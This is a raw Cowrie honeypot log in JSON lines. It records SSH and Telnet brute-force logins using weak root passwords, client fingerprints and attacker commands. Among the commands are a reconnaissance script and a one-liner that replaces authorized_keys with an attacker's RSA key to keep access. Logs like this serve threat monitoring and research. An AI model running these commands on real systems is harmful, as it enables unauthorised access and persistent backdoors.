{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:10:58.695804Z","src_ip":"212.227.235.229","session":"966d806fb5af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51740,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddb8148d0170","protocol":"ssh","message":"New connection: 212.227.125.160:51740 (1.2.3.4:22) [session: ddb8148d0170]","sensor":"my-vps","timestamp":"2025-08-28T11:11:07.636796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:11:07.638091Z","src_ip":"212.227.125.160","session":"ddb8148d0170"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:11:07.818308Z","src_ip":"212.227.125.160","session":"ddb8148d0170"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:11:08.361686Z","src_ip":"212.227.125.160","session":"ddb8148d0170"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:11:09.680768Z","src_ip":"212.227.125.160","session":"ddb8148d0170"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49584,"dst_ip":"1.2.3.4","dst_port":22,"session":"b040ef8c3504","protocol":"ssh","message":"New connection: 217.72.205.35:49584 (1.2.3.4:22) [session: b040ef8c3504]","sensor":"my-vps","timestamp":"2025-08-28T11:11:22.620013Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:11:22.621055Z","src_ip":"217.72.205.35","session":"b040ef8c3504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40334,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4049fc97cc9","protocol":"ssh","message":"New connection: 212.227.235.229:40334 (1.2.3.4:22) [session: e4049fc97cc9]","sensor":"my-vps","timestamp":"2025-08-28T11:11:28.671766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:11:28.672726Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:11:29.049829Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:11:29.969050Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:11:30.903901Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.904625Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.905614Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.906706Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.907641Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.908572Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.909311Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.910399Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.910926Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.911522Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.912113Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.912648Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:11:30.913066Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:11:31.161525Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:11:31.162416Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:11:31.163484Z","src_ip":"212.227.235.229","session":"e4049fc97cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58088,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b2d262d7a81","protocol":"telnet","message":"New connection: 212.227.125.160:58088 (1.2.3.4:23) [session: 7b2d262d7a81]","sensor":"my-vps","timestamp":"2025-08-28T11:11:40.135916Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":57194,"dst_ip":"1.2.3.4","dst_port":22,"session":"baf36edb6ba5","protocol":"ssh","message":"New connection: 27.112.79.123:57194 (1.2.3.4:22) [session: baf36edb6ba5]","sensor":"my-vps","timestamp":"2025-08-28T11:11:55.683013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:11:55.685488Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:11:55.953290Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.login.success","username":"root","password":"bdpanel123","message":"login attempt [root/bdpanel123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:11:56.547900Z","src_ip":"212.227.125.160","session":"de7c492c77ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:11:56.569150Z","src_ip":"212.227.125.160","session":"de7c492c77ef"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass123!","message":"login attempt [root/Pass123!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:11:57.112152Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:11:57.664886Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:11:57.665621Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:11:57.666639Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:11:57.936363Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:11:58.531699Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:11:58.532712Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:11:58.806221Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:11:58.807255Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":57200,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a841895e7db","protocol":"ssh","message":"New connection: 27.112.79.123:57200 (1.2.3.4:22) [session: 2a841895e7db]","sensor":"my-vps","timestamp":"2025-08-28T11:11:59.073376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:11:59.074093Z","src_ip":"27.112.79.123","session":"2a841895e7db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:11:59.340496Z","src_ip":"27.112.79.123","session":"2a841895e7db"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:12:00.450564Z","src_ip":"27.112.79.123","session":"2a841895e7db"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:01.719246Z","src_ip":"27.112.79.123","session":"2a841895e7db"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":57212,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a826b81a6c4","protocol":"ssh","message":"New connection: 27.112.79.123:57212 (1.2.3.4:22) [session: 8a826b81a6c4]","sensor":"my-vps","timestamp":"2025-08-28T11:12:01.989669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:12:01.990655Z","src_ip":"27.112.79.123","session":"8a826b81a6c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:12:02.264103Z","src_ip":"27.112.79.123","session":"8a826b81a6c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55986,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d2aada475e2","protocol":"ssh","message":"New connection: 212.227.125.160:55986 (1.2.3.4:22) [session: 6d2aada475e2]","sensor":"my-vps","timestamp":"2025-08-28T11:12:02.655397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:12:02.822584Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellm